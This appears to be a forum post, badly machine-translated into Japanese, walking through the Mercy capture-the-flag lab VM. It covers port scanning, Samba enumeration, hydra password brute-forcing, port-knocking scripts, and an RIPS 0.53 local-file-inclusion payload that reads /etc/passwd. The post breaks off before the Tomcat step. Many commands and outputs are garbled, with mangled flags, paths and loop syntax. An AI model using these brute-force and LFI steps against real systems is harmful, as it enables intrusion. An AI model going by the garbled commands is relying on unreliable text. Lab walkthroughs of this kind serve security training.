Jump to content

タイトル:DigitalWorld.Local: Mercy Target Machine Invasion

HireHackking

By HireHackking in HACKER

· 1 view

0x01はじめに

Mercyは、PWKコースの安全性に特化したターゲットマシンシステムです。 Mercyは、脆弱なターゲットの名前とは何の関係もないゲーム名です。この実験は、ターゲットマシンを攻撃してルートアクセス許可を取得し、システムディレクトリのproof.txt情報を読むことです。

ターゲットマシンのアドレスをダウンロードしてください:

https://drive.google.com/uc?id=1yzsw1lckjo_wer6pk511dxqbfymmr14yexport=ダウンロード(ダウンロード画像のmercy.mfのsha256値が正しいかどうかを確認するために注意してください)

0x02情報収集

1.生き残った宿主をスカン

root@kali2018:〜#arp-scan -l

je4uikan4h48530.jpg

発見された192.168.1.12は、ターゲットマシンシステムです

2.ポートスキャン

NAMP経由のターゲットマシンのポートスキャン

root@kali2018:〜#nmap -a192.168.1.12

2019-02-12 09:55 ESTでNMAP 7.70(https://nmap.org)を開始

192.168.1.12のNMAPスキャンレポート

ホストはアップ(0.00091Sレイテンシ)です。

表示されていません: 990閉じたポート

Port Stateserviceバージョン

22/TCPフィルタリングSSH

53/TCPオペンドメインISCバインド9.9.5-3UBUNTU0.17(Ubuntu Linux)

| DNS-NSID:

| _ bind.version: 9.9.5-3ubuntu0.17-ubuntu

80/TCPフィルタリングHTTP

110/TCP OpenPop3?

139/tcp opennetbios -ssn samba smbd 3.x -4.x(workgroup: workgroup)

143/TCP OpenImap dovecot IMAPD

| _SSL-DATE: TLSランダム性は時間を表しません

445/tcp opennetbios-ssn samba smbd 4.3.11-ubuntu(workgroup: workgroup)

993/TCP OpenSSL/IMAP DOVECOT IMAPD

| _imap-capabilities:機能

| SSL-CERT: subject: commonname=localhost/organizationname=dovecotメールサーバー

| : 2018-08-24T1:22:55以前は無効です

| _NOT有効なAfter: 2028-08-23T13:22:55

| _SSL-DATE: TLSランダム性は時間を表しません

995/TCP OpenSSL/POP3S?

| SSL-CERT: subject: commonname=localhost/organizationname=dovecotメールサーバー

| : 2018-08-24T1:22:55以前は無効です

| _NOT有効なAfter: 2028-08-23T13:22:55

| _SSL-DATE: TLSランダム性は時間を表しません

8080/TCP Open HTTP Apache Tomcat/Coyote JSP Engine 1.1

| http-methods:

| _潜在的に危険な方法: deleteを入れます

| _http-open-proxy:プロキシはリクエストをリダイレクトしている可能性があります

| _http-server-header: apache-coyote/1.1

| _http-title: apache tomcat

MACアドレス: 00:0C:29:91:A0:C6(VMware)

デバイスタイプ:汎用

running: linux 3.x | 4.x

OS CPE: CPE:/O:LINUX:LINUX_KERNEL3:3 CPE:/O:LINUX33:LINUX_KERNEL:4

OS詳細: Linux 3.2-4.9

ネットワーク距離: 1ホップ

サービスinfo: host: mercy; OS: Linux; CPE: CPE:/O:LINUX:LINUX_KERNEL

ホストスクリプト結果:

| _Clock -Skew:平均: -2H39M59S、偏差: 4H37M07S、MEDIA: 0S

| _NBSTAT: NETBIOS NAME: Mercy、NetBios User:不明、NetBios MAC:不明(不明)

| SMB-OS-Discovery:

| OS: Windows 6.1(Samba 4.3.11-Ubuntu)

|コンピューター名:慈悲

| NetBios Computer Name: Mercy \ X00

|ドメイン名: \ x00

| fqdn: mercy

| _システム時間: 2019-02-12T22336057336054+08:00

| SMB-Security-Mode:

| account_used:ゲスト

| Authentication_Level:ユーザー

| Challenge_response:サポート

| _ message_singing:無効(危険ですがデフォルト)

| SMB2-Security-Mode:

| 2.02:

| _署名が有効になっていますが、必須ではありません

| SMB2-TIME:

|日付: 2019-02-12 09:57:54

| _ start_date: n/a

Traceroute

ホップRTTアドレス

1 0.91 MS 192.168.1.12

OSとサービスの検出が実行されました。間違っていることを報告してください

ターゲットポート445、8080、およびその他のポートが開いていることがわかりました。 22、80などのその他は、ファイアウォールによってブロックされました。その中で、Sambaサービスが開かれました(これはこの記事の重要な浸透ターゲットです)

0x03脆弱性のエクスプロイト

いずれにせよ、私たちが攻撃するアプリケーションの最初のターゲットはapacheです

Tomcat(http://192.168.1.1233608080/)

nzaix1ayhc08531.jpg

Tomcatのバックグラウンド管理ページにアクセスしてみてください。ただし、ログインする前に正しいユーザー名とパスワードを入力する必要があります。あらゆる種類の既知の情報を入力してみてください。ユーザーの構成情報は/etc/tomcat7/tomcat-users.xmlにあることに注意してください。

1.Samba脆弱性攻撃

SMBClientコマンドを使用して、ターゲットマシンで利用可能なSambaサービス共有名をリストします。

root@kali2018:〜#smbclient -nl 192.168.1.12

2dtwqhdupbi8532.jpg

上の写真から共有されたもののいくつかの名前を見ることができます。共有ディレクトリは下のローカルエリアに取り付けられますが、ターゲットシェアにはアクセスが許可されていません。ここではID認証が必要です。

root@kali2018:〜#mkdir /mnt /file

root@kali2018:〜#mount -tcifs 192.168.1.12:/QIU/MNT/ファイル

bemjy2ewkl58533.jpg

2.ENUM4LINUX ENUM SAMBAアカウント

root@kali2018:〜#enum4linux -u -o 192.168.1.12

zf1sz55fj0o8534.jpg

列挙されたアカウント(QIUとPlaidformercy)をmercy.txtに追加し、アカウントを爆破しましょう。

3.SambaアカウントBLAST

root@kali2018:〜#hydra -l mercy.txt -p/usr/share/wordlists/fasttrack.txt smb: //192.168.1.12:139

53cwmswvyf38535.jpg

正常に爆発したアカウントが空であることがわかります。

4.マウントコマンドマウントディレクトリ

root@kali2018:〜#mount -t cifs //192.168.1.12:/QIU/MNT/FILE -O USERNAME=QIU

04z2pqwobzx8536.jpg

マウントディレクトリにファイル情報をリストします

lbowz055fxt8537.jpg

5.プライベートディレクトリ情報コレクション

discovery.privateディレクトリは、いくつかの重要なシステム情報を提供します

root@kali2018:〜#cd/mnt/file/

root@kali2018:/mnt/file#cd .private

root@kali2018:/mnt/file/.private# ls

opensame readme.txtsecrets

root@kali2018:/mnt/file/.private# cd opensame/

root@kali2018:/mnt/file/.private/opensesame# ls

config configPrint

root@kali2018:/mnt/file/.private/opensesame# head -30 config

ここに閲覧の設定があります。

ポートノックデーモン構成

[オプション]

outesyslog

[openhttp]

シーケンス=159,27391,4

seq_timeout=100

command=/sbin /iptables -i input -s%ip%-p tcp - dport 80 -j eccept

tcpflags=syn

[closehttp]

シーケンス=4,27391,159

seq_timeout=100

command=/sbin /iptables -d input -s%ip%-p tcp - dport 80 -j eccept

tcpflags=syn

[openssh]

シーケンス=17301,28504,9999

seq_timeout=100

command=/sbin /iptables -i input -s%ip%-p tcp - d -port22 -j eccept

tcpflags=syn

[Closessh]

シーケンス=9999,28504,17301

seq_timeout=100

command=/sbin /iptables -d input -s%ip%-p tcp - dport22 -j eccept

tcpflags=syn

nshzzwydc1f8538.jpg

上記は、ポートスタートアップデーモンのポートのファイアウォールポート開口部のコマンド構成を示しています。

6。ターゲットマシンファイアウォールポートを開きます

HTTP用の2つのセット、1つはSSH用のシーケンスを参照してください。

(1)HTTPシーケンススクリプト:kncok.sh

#!/bin/bash

159 27391 4のポートの場合4; do nmap -pn 192.168.1.12 -p $ port;

終わり

13digatxjbj8539.jpg

(2)SSHシーケンススクリプト:kncok1.sh

#!/bin/bash

17301年のポート28504 9999; do nmap -pn 192.168.1.12 -p $ port;

終わり

d120s24wjs48540.jpg

(3)HTTPポートルート@kali2018:〜#./knoch.shをシーケンススクリプトから開く

2019-02-12 12:50 ESTでNMAP 7.70(https://NMAP.org)を開始

192.168.1.12のNMAPスキャンレポート

ホストはアップ(0.00044Sレイテンシ)です。

Port Stateservice

159/TCPはNSSルーティングを閉じました

MACアドレス: 00:0C:29:91:A0:C6(VMware)

nmap done: 1 0.24秒でスキャンされたIPアドレス(1ホストアップ)

2019-02-12 12:50 ESTでNMAP 7.70(https://NMAP.org)を開始

192.168.1.12のNMAPスキャンレポート

ホストはアップ(0.00053Sレイテンシ)です。

ポートステートサービス

27391/TCPは不明を閉じました

MACアドレス: 00:0C:29:91:A0:C6(VMware)

nmap done: 1 0.23秒でスキャンされたIPアドレス(1ホストアップ)

2019-02-12 12:50 ESTでNMAP 7.70(https://NMAP.org)を開始

192.168.1.12のNMAPスキャンレポート

ホストはアップ(0.00042Sレイテンシ)です。

Port Stateservice

4/TCPは不明を閉じました

MACアドレス: 00:0C:29:91:A0:C6(VMware)

NMAP DONE: 1 IPアドレス(1ホストアップ)0.22秒でスキャン

0hbceqbb04c8541.jpg

(4)SSHポートルート@kali2018:〜#./knoch1.shをシーケンススクリプトから開く

2019-02-12 12336058 ESTでNMAP 7.70(https://nmap.org)を開始

192.168.1.12のNMAPスキャンレポート

ホストはアップ(0.00049Sレイテンシ)です。

Port Stateservice

17301/TCP閉鎖不明

MACアドレス: 00:0C:29:91:A0:C6(VMware)

NMAP DONE: 1 IPアドレス(1ホストアップ)0.26秒でスキャン

2019-02-12 12336058 ESTでNMAP 7.70(https://nmap.org)を開始

192.168.1.12のNMAPスキャンレポート

ホストはアップ(0.00042Sレイテンシ)です。

Port Stateservice

28504/TCPは不明を閉じました

MACアドレス: 00:0C:29:91:A0:C6(VMware)

nmap done: 1 0.28秒でスキャンされたIPアドレス(1ホストアップ)

2019-02-12 12336058 ESTでNMAP 7.70(https://nmap.org)を開始

192.168.1.12のNMAPスキャンレポート

ホストはアップ(0.00031Sレイテンシ)です。

Port Stateservice

9999/TCP閉じたアビス

MACアドレス: 00:0C:29:91:A0:C6(VMware)

nmap done: 1 0.27秒でスキャンされたIPアドレス(1ホストアップ)

i2wuvxwygpx8542.jpg

上記のコマンドはポート80と22を開設し、現在80ポートWebサイトがKaliシステムの下で開かれています。

4qxv2yrcsxh8543.jpg

7。ディレクトリスキャン

ターゲットマシンシステムポート80ウェブサイトをディレクトリツールDIRBを介してスキャンし、robots.txtファイルが存在することを発見しました

root@kali2018:〜#dirb http://192.168.1.12

yldy2ckd0nh8544.jpg

robots.txtの接続アドレスを開き、興味深いディレクトリ /Omercyを見つけます

zwyidyirold8545.jpg

このディレクトリウェブサイトを開くと、RIPS 0.53バージョンが存在することがわかります

qq3hnvec20t8546.jpg

8. rips脆弱性コレクション

EDB-ID18660によると、RIPS 0.53はローカルファイル包含(LFI)の脆弱性の影響を受けやすくなっています。 (RIPS 0.53 LFI)

Exploit-DBで0.53の脆弱性を検索します。

https://www.exploit-db.com/exploits/18660

jbnlnrsgfcj8547.jpg

そのPOCは:です

http://LocalHost/rips/windows/code.php?file=././././././etc/passwd

ローカルファイルには、ターゲットマシン /etc /passwdを読み取る情報を含めることができます。

vgsv3m5rtqe8548.jpg

9.Tomcatは再び侵入します

ローカルには、Tomを介してLipsのLFI脆弱性を介して含まれています

  • 0 Comments

    Recommended Comments

    There are no comments to display.

    Guest
    Add a comment...